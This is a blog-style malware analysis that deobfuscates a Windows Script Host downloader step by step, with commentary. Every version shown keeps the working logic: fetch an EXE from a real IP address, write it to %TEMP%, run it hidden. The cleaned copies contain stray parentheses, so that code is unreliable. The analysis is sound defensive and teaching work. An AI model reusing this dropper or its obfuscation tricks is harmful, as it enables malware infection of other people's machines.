Wednesday, November 25, 2015

Malicious Javascript Walk-thru

Saw this malicious obfuscated javascript and thought it was worth a walk-thru. It starts as this ugly mess. (
  // Raw sample as captured (a Windows Script Host downloader, not browser JavaScript).
  // Obfuscation seen here: random identifiers, junk /* */ comments, comma expressions such
  // as (221404, "ream") that evaluate to their last operand, a constant ternary, and strings
  // split across concatenations so that "WScript.Shell", "MSXML2.XMLHTTP" and "ADODB.Stream"
  // never appear literally. Each piece is walked through below.
  function (olcdENyNGCBd) {
   // olcdENyNGCBd is the script's global object, passed in as `this` on the last line.
   function kKVXeV(msezIazw) {
    return new olcdENyNGCBd.ActiveXObject(msezIazw)
   }
   // kMFFvyAqh: "download still in progress" flag; mEwAroXP evaluates to "B.Stream".
   var kMFFvyAqh = true, mEwAroXP = ("B.St"+(221404, "ream"));
   var kbtEwr;
   // kbtEwr(url, filename, unused): download url to %TEMP%\filename and run it.
   kbtEwr = function (CJxJzZ, XuSlNgfI, SoRNuldTayYND) {
   // Constant ternary: (1) is always truthy, so this is "WScript.Shell" (assigned as an implicit global).
   tbWEefAFUAZSaO=((1/*s987111nuM69919eOiZ*/)?"WScri":"")+"pt.Shell";
   var CCPoAXzX = kKVXeV(tbWEefAFUAZSaO);
   var pPDVaIAYVOIp = "2.XMLHTTP";
   // "MSXML2.XMLHTTP" - the HTTP client used for the download.
   var CtsZjtNlqpP = kKVXeV("MSXML"+(381144, pPDVaIAYVOIp));
   var tndpSoRVjetRf = "%TEMP%\\";
   var bIVrpPKIHb = CCPoAXzX["Expa"+/*s925956nM261933eOZ*/"ndEnvironmentStrings"](tndpSoRVjetRf)
   // Re-declares the parameter; the comma expression yields XuSlNgfI, so this is %TEMP%\<filename>.
   var XuSlNgfI = bIVrpPKIHb +(437532602659, XuSlNgfI);
   // Runs on every readyState change; only state 4 (request complete) writes the file.
   CtsZjtNlqpP.onreadystatechange = function (){
    if (CtsZjtNlqpP.readyState == 4){
     kMFFvyAqh = false;
     // "ADODB.Stream": type 1 = binary; saveToFile option 2 overwrites an existing file.
     with(kKVXeV("ADOD" + mEwAroXP)){
      open();
      type = 1;
      write(CtsZjtNlqpP.ResponseBody);
      saveToFile(XuSlNgfI, 2);
      close();
      return XuSlNgfI;
     }
    }
   }
   // The comma expression collapses to "GET"; third argument false = synchronous request.
   CtsZjtNlqpP.open("G" + (3828034, 4609216, /*dca645894zYtzkrxTK747381IlaIWQJrHGjLqXIjNQmXamgjYPW*/ "ET" /*dcazYtzkrx637703TKIlaIWQJr683091HGjLqXIjNQmX29671amgjYPW*/), CJxJzZ, false);
   CtsZjtNlqpP.send();
   // Sleep is called once here; the loop below only references its result and does not sleep again.
   yimseHvs = olcdENyNGCBd.WScript.Sleep(1100)
   while (kMFFvyAqh) {yimseHvs}
   // Comma expression yields 1656, so this condition is always true.
   if (((new Date())>0,1656))
    CCPoAXzX.Run(XuSlNgfI, 0, 0);
   }
   // Builds "http" one piece at a time, then fetches the payload from a bare IP address.
   XkpYNx = "h";
   XkpYNx += "t"; /*XkpYNxCtsZjtNlqpPkKVXeV*/
   XkpYNx += "tp";
   kbtEwr(XkpYNx + "://" + "46.30.45.73/mert.e"+"x"+"e", "115987449.exe", 1);
  }
)
(this) /*507952955735917811792346152771*/


I can quickly make it prettier by removing the comments, removing the unnecessary concatenations, removing the unnecessary conditionals, and replacing the unnecessary variables with their values.

// Intermediate clean-up: junk comments, comma expressions, the dead conditional and the
// string splitting are gone; identifiers are still the sample's own. Behaviour is unchanged.
(
  function (olcdENyNGCBd) {
   // Cleared by the readyState handler once the download has completed.
   var kMFFvyAqh = true;
   var kbtEwr = function () {
    // WScript.Shell (environment lookup + process launch) and MSXML2.XMLHTTP (HTTP client).
    // NOTE(review): the stray ")" on the next line and on the open() call look like
    // transcription slips in the write-up; the raw sample above does not have them.
    var CCPoAXzX = olcdENyNGCBd.ActiveXObject("WScript.Shell");
    var CtsZjtNlqpP = olcdENyNGCBd.ActiveXObject("MSXML2.XMLHTTP"));
    // Drop path: %TEMP%\115987449.exe
    var bIVrpPKIHb = CCPoAXzX["ExpandEnvironmentStrings"]("%TEMP%\\")
    var XuSlNgfI = bIVrpPKIHb +"115987449.exe";
    // On readyState 4 (complete) the raw response body is written to disk via ADODB.Stream
    // (type 1 = binary, saveToFile option 2 = overwrite).
    CtsZjtNlqpP.onreadystatechange = function (){
     if (CtsZjtNlqpP.readyState == 4){
      kMFFvyAqh = false;
      with(olcdENyNGCBd.ActiveXObject("ADODB.Stream")){
       open();
       type = 1;
       write(CtsZjtNlqpP.ResponseBody);
       saveToFile(XuSlNgfI, 2);
       close();
       return XuSlNgfI;
      }
     }
    }
    // Synchronous GET of the payload; nothing checks the HTTP status before the body is written.
    CtsZjtNlqpP.open("GET" ), "http://46.30.45.73/mert.exe", false);
    CtsZjtNlqpP.send();
    // Sleep is called once; the loop body only references its result.
    yimseHvs = olcdENyNGCBd.WScript.Sleep(1100)
    while (kMFFvyAqh) {
    yimseHvs
   }
   // Launch the dropped file with window style 0 (hidden) and without waiting for it to return.
   CCPoAXzX.Run(XuSlNgfI, 0, 0);
  }
  kbtEwr();
  }
)
(this)


Then I can replace the ugly obfuscated variable names with ones that have more meaning to me, and also eliminate the wrapper function call that wasn't necessary.

// Deobfuscated downloader: fetches an EXE over plain HTTP, writes it to %TEMP%, and runs it hidden.
// Runs under the Windows Script Host - ActiveXObject and WScript are WSH objects, not browser APIs.
// Observable behaviour, in order: script host process -> HTTP GET to a bare IP -> binary file
// written under %TEMP% -> that file launched as a new process.
var isExeStillDownloading = true;
// WScript.Shell: used below for ExpandEnvironmentStrings and Run.
var shellPrompt = this.ActiveXObject("WScript.Shell");
// MSXML2.XMLHTTP: the HTTP client used for the download.
// NOTE(review): the stray ")" here and on the open() call look like transcription slips in
// the write-up; the raw sample does not have them.
var webRequest = this.ActiveXObject("MSXML2.XMLHTTP"));
// Resolve %TEMP% to an absolute path; the payload lands in the current user's temp folder.
var tempFolderPath = shellPrompt["ExpandEnvironmentStrings"]("%TEMP%\\")
// Drop location on disk - a fixed, numeric-looking filename.
var payloadDestination = tempFolderPath +"115987449.exe";
// Fires on every readyState change; only readyState 4 (request complete) does any work.
// No HTTP status check: whatever body came back is written to disk.
webRequest.onreadystatechange = function (){
  if (webRequest.readyState == 4){
   isExeStillDownloading = false;  // releases the wait loop below
   // ADODB.Stream with type = 1 (binary) writes the raw response body to disk.
   // NOTE(review): inside this callback `this` is no longer the captured global the
   // original wrapper passed in; the raw sample used the closed-over parameter instead.
   with(this.ActiveXObject("ADODB.Stream")){
    open();
    type = 1;
    write(webRequest.ResponseBody);
    saveToFile(payloadDestination, 2);   // option 2 = overwrite if the file already exists
    close();
    return payloadDestination;           // return value is never used by the caller
   }
  }
}
// Synchronous GET (third argument false) of the payload straight from a bare IP address.
webRequest.open("GET" ), "http://46.30.45.73/mert.exe", false);
webRequest.send();
// Wait, sleeping 1.1 s per iteration, until the handler clears the flag.
while (isExeStillDownloading) {
  this.WScript.Sleep(1100)
}
// Execute the dropped file with window style 0 (hidden) and without waiting for it to finish.
shellPrompt.Run(payloadDestination, 0, 0);


Wow, that looks much more readable! Let's go through line by line now.

var isExeStillDownloading = true;



This variable stays true until the EXE has been downloaded from the website, at which point it is set to false.

var shellPrompt = this.ActiveXObject("WScript.Shell");



This variable will hold the ActiveX object that allows the attacker to interact with the command prompt on the windows box.

var webRequest = this.ActiveXObject("MSXML2.XMLHTTP"));



This variable will hold the ActiveX object that allows the attacker to make web requests to download a file.

var tempFolderPath = shellPrompt["ExpandEnvironmentStrings"]("%TEMP%\\")



This variable will hold the Windows temp folder path (obtained through the shell object above). Why does he care about the temp folder? Because it's one place he's almost guaranteed to have write access to, so he can download, save, and run a file from it.

var payloadDestination = tempFolderPath +"115987449.exe";



This variable will hold the final destination for the malicious executable the attacker is trying to download to the machine and run.

webRequest.onreadystatechange = function (){
  if (webRequest.readyState == 4){
isExeStillDownloading = false;


This code registers a listener (basically a function that does not get executed until a specific event happens). In this case the listener is on the web request (the file download). The function gets called each time the state of the request changes. If the state has changed to 4 (which means request COMPLETED), the first thing it does is change the variable used above to indicate that the download is complete.

with(this.ActiveXObject("ADODB.Stream")){



This code then creates an ActiveX object that is used to save the downloaded file to the file system on the windows box in the temp folder.

open();
type = 1;
write(webRequest.ResponseBody);
saveToFile(payloadDestination, 2);
close();


Then the ActiveX object above is actually used to write the downloaded response body to a file in the temp folder and save it to disk.

webRequest.open("GET" , "http://46.30.45.73/mert.exe", false);
webRequest.send();
while (isExeStillDownloading) {
  this.WScript.Sleep(1100)
}


It may be a bit difficult to understand at first, but the listener described in the previous sections hasn't actually been executed yet. Now, with the lines above, the web request is used to fetch the primary payload (mert.exe). Then the code sits and loops, sleeping, doing nothing until the file completes its download. Once the download is complete, the listener described earlier is called, it sets that variable to false to say that the download is complete, and the sleeping loop exits.

shellPrompt.Run(payloadDestination, 0, 0);



The final step is for the attacker to use the shell prompt to execute the malicious EXE he just downloaded and saved to disk. Say bye-bye to your PC, because it's now under his control, not yours.







Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
